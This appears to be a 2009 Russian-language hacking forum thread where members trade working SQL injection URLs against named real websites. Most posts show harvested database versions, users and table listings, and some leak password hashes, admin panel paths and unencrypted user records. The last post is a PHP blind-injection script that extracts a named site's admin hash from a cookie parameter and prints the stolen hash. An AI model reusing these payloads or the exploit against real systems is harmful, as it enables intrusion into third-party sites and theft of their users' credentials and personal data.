11.01.2009, 13:30
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
С нами:
9510146
Репутация:
1550
|
|
http://www.toumaz.com/public/news.php?id=999+UNION+SELECT+1,2,3,concat_ws(0x3a3 a,version(),user(),database()),5,6+--
standard::toumaz_extrastuf@evoked.evokedset.net::t oumaz
=========================
http://www.welsh-premier.com/news.php?ID=99999+UNIOn+SELECT+1,concat_ws(0x3a3a, version(),user(),database()),3,4,5,6,7,8,9,10,11,1 2,13+--
4.1.19::welshprem@localhost::welshprem
=========================
http://www.electionguide.org/country-news.php?ID=-208+union+select+1,2,concat_ws(0x3a3a,version(),us er(),database()),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0 ,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5 ,6,7,8,9,0--
смотрим в титл (спасибо R1dex'у)
4.1.22::eguide@localhost::eguide
Последний раз редактировалось wildshaman; 11.01.2009 в 13:38..
|
|
|
11.01.2009, 15:50
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
С нами:
9288132
Репутация:
571
|
|
"Выставка деловой авиации"
Код:
http://2006.jetexpo.ru/?act=jet&next=-3+union+select+1,2,3,version(),5,6,7,8,9,null,11--
5.0.67-log
__________________________________________________ ____
"Туристическая фирма АЗАРТ"
Код:
http://www.hazart.ru/index.php?id=-43+union+select+1,2,3,4,5,version()--
5.0.67-log
__________________________________________________ ____
"IndexBox – это маркетинговые исследования, анализ и обзоры рынков"
Код:
http://index-box.ru/news/?news_id=-57+union+select+1,2,concat(login,0x3a,password),4,5,6,7,8,9,10,11,12+from+indexbox_users--
quake : 8fb1a40e1f09124c07763cd75f664c5c : rfrnec
Код:
http://index-box.ru/admin/
|
|
|
|
11.01.2009, 16:55
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
С нами:
9510146
Репутация:
1550
|
|
http://www.logsec.com/news_record.php?news_id=-82+union+select+1,2,3,concat_ws(0x3a3a,version(),u ser(),database()),5+--
4.1.22::logsec-www@localhost::logsec
============
http://www.raconline.org/news/news_details.php?news_id=-10204+union+select+1,2,concat_ws(0x3a3a,version(), user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32, 33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49 ,50,51,52,53+--
5.0.51a::w_rac@localhost::rac
ПР 7!
Структура:
Код:
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
PROFILING
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
bordercontact
bordercontactstate
bordercontacttopic
borderdata
bordertopic
bordertopicdoc
bordertopicjournal
bordertopicorg
bordertopicrelated
bordertopicsuccess
bordertopictool
cam_test
contactexpert
contacts
data
deltacontact
deltacontactstate
deltatopic
deltatopicdoc
deltatopicjournal
deltatopicorg
deltatopicsuccess
deltatopictool
docpubtopic
docs
docsubject
events
experts
filetest
funding
fundingbordertopic
fundingdeltatopic
fundinggranttopic
glossary
granttopic
igdoc
igevent
igfunding
igglossary
igjournal
igmap
ignews
igorg
igtool
infoguides
infoguidesee
journalpubtopic
journals
julie
list
listTEST
listserv
maps
newig
news
newstopic
organizations
orggroup
newig
news
newstopic
organizations
orggroup
orgorggroup
promotions
pubtopics
relationships
requestors
rhinaddress
rhinagency
rhinbureau
rhindept
rhinlist
rhinlistparticipants
rhinorg
rhinpeople
rhinupdate
searchlog
see
statedoc
statefunding
statejournal
statemap
statenews
stateorg
states
stateterr
statetool
stopwords
subjects
success
successgranttopic
successstate
survey_aug2006
survey_june2003
survey_may2004
survey_may2007
survey_nov2004
survey_sept2005
territories
test
toolorggroup
toolpubtopic
tools
topic
trackuser
webuse
webwatch
===============================
http://www.roamsecure.net/pressitem.php?news_id=-189+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,vers ion(),user(),database()),8,9,10+FROM+INFORMATION_S CHEMA.TABLES+--
5.0.45::wsusr@localhost::roamsecure
Структурко:
Код:
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
PROFILING
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
contentsofsite
contentsofsitedev
customers
customersdev
employment
employmentdev
employmentold
industrylinks
jobs
links
nav
navitem
news
newsdev
ourteam
partners
presskit
resources
Последний раз редактировалось wildshaman; 11.01.2009 в 18:16..
|
|
|
|
11.01.2009, 19:59
|
|
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
С нами:
9838057
Репутация:
302
|
|
Код:
http://www.alpisport.cz/index.php?desk_contain=offer/news/news_action.php&desk_height=857&nws_id=-174%20union%20select%201,2,3,4,concat(username,0x3a,password,0x3a,check_password,0x3a,company,0x3a,firstname,0x3a,surname,0x3a,city,0x3a,email,0x3a,administrator),6,7,8,9,10,11,12,13,14,15,16,17,18,19%20from%20users--
Вылезает целая куча пользователей с мыльниками адресами телефонами и т.д. Пароли без шифровки. Вход на главной страничке =) |
|
|
|
11.01.2009, 20:05
|
|
Участник форума
Регистрация: 28.07.2008
Сообщений: 158
С нами:
9361826
Репутация:
115
|
|
Google PR: 5/10
Yandex CY: 3600
Код:
http://www.lipetsk.ru/view.php?id=-762+union+select+1,2,3,4,5,6,group_concat(table_name),8,9,1,2,3,4,5+from+information_schema.tables+where+table_schema!=%27information_schema%27--+
Несколько сайтов походу на одной MySQL базе, в том числе база пользователей местного провайдера =) |
|
|
|
11.01.2009, 20:42
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
С нами:
9510146
Репутация:
1550
|
|
https://www.scottiescoffee.net/store/productdetail.php?id=-11+union+select+1,2,3,4,5,concat_ws(0x3a3a,version (),user(),database()),7,8,9,10,11,12+--
5.0.67-community::scotties_kirby@localhost::scotties_coff ee
===============================
http://www.keenanwinery.com/productdetail.php?id=-81+union+select+1,concat_ws(0x3a3a,version(),user( ),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18+--
4.1.22-standard::kwine@localhost::ssl_keenanwinery_com_-_wine
===============================
http://www.sargodhatrackplant.com/productDetail.php?ID=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,versio n(),user(),database()),8,9,10,11+--
5.0.51a-community::stpadmin@localhost::stpdata
===============================
http://www.gpssource.com/productdetail.php?id=-146+union+select+1,2,concat_ws(0x3a3a,version(),us er(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27+--
4.0.27::root@localhost::gpsdb
===============================
http://www.gulfphotoplus.com/gppnew/ProductDetail.php?ID=-455+union+select+1,2,3,4,concat_ws(0x3a3a,version( ),user(),database()),6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 +--
5.0.22::gulfpp@localhost::gulfbcom_uks15467gpp1
===============================
http://www.arrowvalves.co.uk/productdetail.php?id=-1+union+select+1,2,concat_ws(0x3a3a,version(),user (),database()),4,5,6,7,8,9,10,11,12,13+--
4.0.27-standard-log::dbo157947898@212.227.127.61::db157947898
===============================
http://www.splitreason.com/productdetail.php?id=-329+union+select+1,2,3,4,5,6,7,concat_ws(0x3a3a,ve rsion(),user(),database()),9,10,11,12,13,14,15+--
5.0.67-log::split_w@localhost::split_splitreason
===============================
http://www.alabamacylinderhead.com/productdetail.php?id=-109+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,concat_ws(0x3a3a,version(),user(),d atabase()),21,22,23,24,25,26+--
5.0.32-Debian_7etch8-log::acheinc@localhost::alcylinder
===============================
хух, на сегоднея все. Кто что интересное там раскопайте - отпишитесь в ПМ плиз )
Последний раз редактировалось wildshaman; 11.01.2009 в 20:50..
|
|
|
|
11.01.2009, 21:08
|
|
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
С нами:
9838057
Репутация:
302
|
|
Кому не лень покрутите +)
http://www.pa-digital.com.pa/admin_pa/preview.php?id=-%2020096+union+select+%201,2/*
http://bagrat.ru/index.php?page_id=-1%20union%20select%201,2,3,4,concat(version(),0x3a ,database()),6%20--
http://wow.glgilde.de/gildenseite/index.php?site=news_comments&newsID=-1%20union%20select%201,2,version(),4,5,6--
http://www.favex.fi/index.php?id=9&news_action=view&news_id=-5+union%20select%201,2,table_name,4,5,6,7%20from%2 0information_schema.tables%20limit%2020,1%20--
http://yeshua.grrbrr.ca/news_action.phtml?article_id=-2 union select 1,2,3,4,5,6,7,8,9--
http://www.hensel-haustechnik.de/index.php?&news_action=show&news_id=-
http://www.dakom.cg.yu/_eng/index.php?detaljnije&id=2%20union%20select%201,2%2 0--
|
|
|
|
11.01.2009, 21:22
|
|
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
С нами:
9196401
Репутация:
930
|
|
Сообщение от Assembler
Кому не лень покрутите +)
http://www.pa-digital.com.pa/admin_pa/preview.php?id=-%2020096+union+select+%201,2/*
http://bagrat.ru/index.php?page_id=-1%20union%20select%201,2,3,4,concat(version(),0x3a ,database()),6%20--
http://wow.glgilde.de/gildenseite/index.php?site=news_comments&newsID=-1%20union%20select%201,2,version(),4,5,6--
http://www.favex.fi/index.php?id=9&news_action=view&news_id=-5+union%20select%201,2,table_name,4,5,6,7%20from%2 0information_schema.tables%20limit%2020,1%20--
http://yeshua.grrbrr.ca/news_action.phtml?article_id=-2 union select 1,2,3,4,5,6,7,8,9--
http://www.hensel-haustechnik.de/index.php?&news_action=show&news_id=-
http://www.dakom.cg.yu/_eng/index.php?detaljnije&id=2%20union%20select%201,2%2 0--
нераскрученные inj, то что ты выложил половина не робит, больше такое сюда не кидай
|
|
|
|
12.01.2009, 04:42
|
|
Новичок
Регистрация: 21.01.2008
Сообщений: 4
С нами:
9634669
Репутация:
0
|
|
посмотрите понять не могу чего за уязвимость http://dasha.com.ua/wellness_descr.php?page=i3%27
|
|
|
|
11.01.2009, 21:14
|
|
Участник форума
Регистрация: 28.07.2008
Сообщений: 158
С нами:
9361826
Репутация:
115
|
|
http://www.dafont.com/ PR7
Уязвим куки параметр dfcolorid, перебором достаем хэш любого юзера. Сделал сплоит:
PHP код:
<?php
error_reporting(E_ALL);
set_time_limit(0);
for ($j=1; $j<50; $j++) {
for ($i=1; $i<255; $i++) {
$ch=curl_init();
$ua = 'User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Widows NT)';
curl_setopt($ch, CURLOPT_URL, "http://www.dafont.com/color.php");
curl_setopt($ch, CURLOPT_USERAGENT, $ua);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_REFERER, "http://www.dafont.com/color.php");
curl_setopt($ch, CURLOPT_COOKIE, "PHPSESSID=79302419265e6a9cff6b242ced6723fa; dfu2=221554|c2fe885b93fc3ce0dc1eada368172049; dfcolorid=364822*if(ASCII(SUBSTRING((select password from user where username=0x61646D696E), $j, 1))=$i,2,1)");
$answer=curl_exec($ch);
curl_close($ch);
echo $i."=";
$color=substr($answer,strpos($answer,'name="nbg1"')+33,6);
if ($color=='66FF99') {echo "<br>Найден: ".$i; break;}
}
if ($i>=254) break;
}
?>
Не оптимизирован конечно но пох, за час достает хэш =)
Admin
4d5542b0965999f5aad0fcad908d6d09 |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
